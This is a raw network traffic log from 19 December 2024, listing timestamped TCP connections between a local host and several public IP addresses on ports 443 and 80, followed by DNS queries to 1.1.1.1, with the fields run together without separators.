                                                                                                                  Dec 19, 2024 11:43:16.014183044 CET44349742104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:16.752903938 CET44349741104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:16.753221989 CET49741443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:16.753268957 CET44349741104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:16.753607035 CET44349741104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:16.753918886 CET49741443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:16.753989935 CET44349741104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:16.754050970 CET49741443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:16.799326897 CET44349741104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:17.197053909 CET44349741104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:17.197156906 CET44349741104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:17.197228909 CET49741443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:17.198005915 CET49741443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:17.198039055 CET44349741104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:17.226790905 CET44349742104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:17.227065086 CET49742443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:17.227091074 CET44349742104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:17.228624105 CET44349742104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:17.228686094 CET49742443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:17.229060888 CET49742443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:17.229080915 CET49742443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:17.229125023 CET44349742104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:17.229149103 CET49742443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:17.229171038 CET49742443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:17.229470968 CET49743443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:17.229527950 CET44349743104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:17.229609013 CET49743443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:17.229846001 CET49743443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:17.229862928 CET44349743104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:18.461815119 CET44349743104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:18.462248087 CET49743443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:18.462280989 CET44349743104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:18.463973045 CET44349743104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:18.464091063 CET49743443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:18.465503931 CET49743443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:18.465589046 CET44349743104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:18.465694904 CET49743443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:18.465703011 CET44349743104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:18.506747007 CET49743443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:19.303056002 CET44349743104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:19.303194046 CET44349743104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:19.303411007 CET49743443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:19.304214954 CET49743443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:19.304240942 CET44349743104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:19.455468893 CET49744443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:19.455599070 CET44349744104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:19.455701113 CET49744443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:19.456003904 CET49744443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:19.456033945 CET44349744104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:20.671473026 CET44349744104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:20.671917915 CET49744443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:20.671982050 CET44349744104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:20.675684929 CET44349744104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:20.676321983 CET49744443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:20.676321983 CET49744443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:20.676363945 CET49744443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:20.676422119 CET49744443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:20.676528931 CET44349744104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:20.676592112 CET49744443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:20.676848888 CET49746443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:20.676899910 CET44349746104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:20.676975012 CET49746443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:20.677237034 CET49746443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:20.677253008 CET44349746104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:21.889993906 CET44349746104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:21.890363932 CET49746443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:21.890450001 CET44349746104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:21.891490936 CET44349746104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:21.891562939 CET49746443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:21.891915083 CET49746443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:21.891988039 CET44349746104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:21.892107010 CET49746443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:21.892127037 CET44349746104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:21.945811033 CET49746443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:22.755526066 CET44349746104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:22.755669117 CET44349746104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:22.755767107 CET49746443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:22.756586075 CET49746443192.168.2.16104.21.32.251
                                                                                                                  Dec 19, 2024 11:43:22.756608963 CET44349746104.21.32.251192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:26.858429909 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:26.858480930 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:26.858577013 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:26.858783007 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:26.858793020 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:28.646341085 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:28.646564960 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:28.646598101 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:28.648257971 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:28.648350000 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:28.649337053 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:28.649426937 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:28.649477005 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:28.695339918 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:28.699755907 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:28.699779987 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:28.747756004 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.161103964 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.210798025 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.226351976 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.226381063 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.226429939 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.226457119 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.226464987 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.226476908 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.226510048 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.226536989 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.226558924 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.226577044 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.226609945 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.399199963 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.399224997 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.399281979 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.399311066 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.399333954 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.399363995 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.399383068 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.399436951 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.399446011 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.450788975 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.472865105 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.472886086 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.472927094 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.472944975 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.472976923 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.472995043 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.473011017 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.473052979 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.562812090 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.562834024 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.562874079 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.562921047 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.562938929 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.562972069 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.563000917 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.593611002 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.593657017 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.593720913 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.593744993 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.593771935 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.593789101 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.593795061 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.617578030 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.617655039 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.617672920 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.617683887 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.617718935 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.638930082 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.638976097 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.639030933 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.639041901 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.639055967 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.690782070 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.751565933 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.751588106 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.751626968 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.751660109 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.751683950 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.751701117 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.751728058 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.751756907 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.761320114 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.761362076 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.761424065 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.761431932 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.761466026 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.761548996 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.761603117 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.761630058 CET49750443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.761650085 CET44349750152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.906963110 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.907001972 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:29.907073021 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.907306910 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:29.907326937 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:31.683731079 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:31.684061050 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:31.684079885 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:31.687892914 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:31.687994003 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:31.688385010 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:31.688540936 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:31.688591957 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:31.735825062 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:31.735840082 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:31.783787012 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.036977053 CET4970080192.168.2.16199.232.210.172
                                                                                                                  Dec 19, 2024 11:43:32.037086964 CET4970280192.168.2.16199.232.210.172
                                                                                                                  Dec 19, 2024 11:43:32.156918049 CET8049700199.232.210.172192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.157023907 CET4970080192.168.2.16199.232.210.172
                                                                                                                  Dec 19, 2024 11:43:32.157645941 CET8049702199.232.210.172192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.157710075 CET4970280192.168.2.16199.232.210.172
                                                                                                                  Dec 19, 2024 11:43:32.200748920 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.243840933 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.270952940 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.270984888 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.271029949 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.271053076 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.271070957 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.271107912 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.271131992 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.271168947 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.271194935 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.271200895 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.324631929 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.439635992 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.439655066 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.439702034 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.439722061 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.439742088 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.439743996 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.439763069 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.439801931 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.439832926 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.512392044 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.512408972 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.512434959 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.512471914 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.512501955 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.512516975 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.512537956 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.512554884 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.607126951 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.607175112 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.607230902 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.607249975 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.607296944 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.607342005 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.633819103 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.633861065 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.633903980 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.633912086 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.633946896 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.633971930 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.656971931 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.657004118 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.657056093 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.657064915 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.657102108 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.657114029 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.676105022 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.676136971 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.676184893 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.676201105 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.676219940 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.676239967 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.789560080 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.789601088 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.789633036 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.789639950 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.789670944 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.789689064 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.798357964 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.798408985 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.798427105 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.798434019 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.798460007 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.798532009 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:32.798576117 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.798697948 CET49753443192.168.2.16152.199.21.175
                                                                                                                  Dec 19, 2024 11:43:32.798710108 CET44349753152.199.21.175192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:48.281032085 CET49757443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:43:48.281140089 CET44349757142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:48.281249046 CET49757443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:43:48.281487942 CET49757443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:43:48.281519890 CET44349757142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:50.052479029 CET44349757142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:50.052839041 CET49757443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:43:50.052872896 CET44349757142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:50.053230047 CET44349757142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:50.053548098 CET49757443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:43:50.053625107 CET44349757142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:50.098826885 CET49757443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:43:59.776966095 CET44349757142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:59.777043104 CET44349757142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:59.777306080 CET49757443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:44:00.173613071 CET49757443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:44:00.173686028 CET44349757142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:44:15.219124079 CET49694443192.168.2.1620.190.177.146
                                                                                                                  Dec 19, 2024 11:44:15.219196081 CET4969780192.168.2.16199.232.210.172
                                                                                                                  Dec 19, 2024 11:44:15.219201088 CET4969980192.168.2.16192.229.221.95
                                                                                                                  Dec 19, 2024 11:44:15.339153051 CET4434969420.190.177.146192.168.2.16
                                                                                                                  Dec 19, 2024 11:44:15.339277029 CET49694443192.168.2.1620.190.177.146
                                                                                                                  Dec 19, 2024 11:44:15.339704037 CET8049699192.229.221.95192.168.2.16
                                                                                                                  Dec 19, 2024 11:44:15.339759111 CET8049697199.232.210.172192.168.2.16
                                                                                                                  Dec 19, 2024 11:44:15.339776993 CET4969980192.168.2.16192.229.221.95
                                                                                                                  Dec 19, 2024 11:44:15.339819908 CET4969780192.168.2.16199.232.210.172
                                                                                                                  Dec 19, 2024 11:44:21.050149918 CET49703443192.168.2.1620.190.177.146
                                                                                                                  Dec 19, 2024 11:44:21.170206070 CET4434970320.190.177.146192.168.2.16
                                                                                                                  Dec 19, 2024 11:44:21.170340061 CET49703443192.168.2.1620.190.177.146
                                                                                                                  Dec 19, 2024 11:44:48.332128048 CET49761443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:44:48.332194090 CET44349761142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:44:48.332402945 CET49761443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:44:48.332653999 CET49761443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:44:48.332681894 CET44349761142.250.181.100192.168.2.16
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 19, 2024 11:42:44.090904951 CET53611441.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:44.098968029 CET53555781.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:44.100544930 CET53618661.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:46.800616026 CET53570281.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:47.153685093 CET6411253192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:47.154126883 CET5697653192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:47.267957926 CET53510171.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:47.608551979 CET53641121.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:47.612098932 CET53569761.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:48.216562033 CET5600353192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:48.216758966 CET5629353192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:48.353580952 CET53560031.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:48.353620052 CET53562931.1.1.1192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:51.123836040 CET5271453192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:51.123986006 CET5543853192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:51.124262094 CET5300953192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:51.124383926 CET5526253192.168.2.161.1.1.1
                                                                                                                  Dec 19, 2024 11:42:51.124689102 CET5121553192.168.2.161.1.1.1
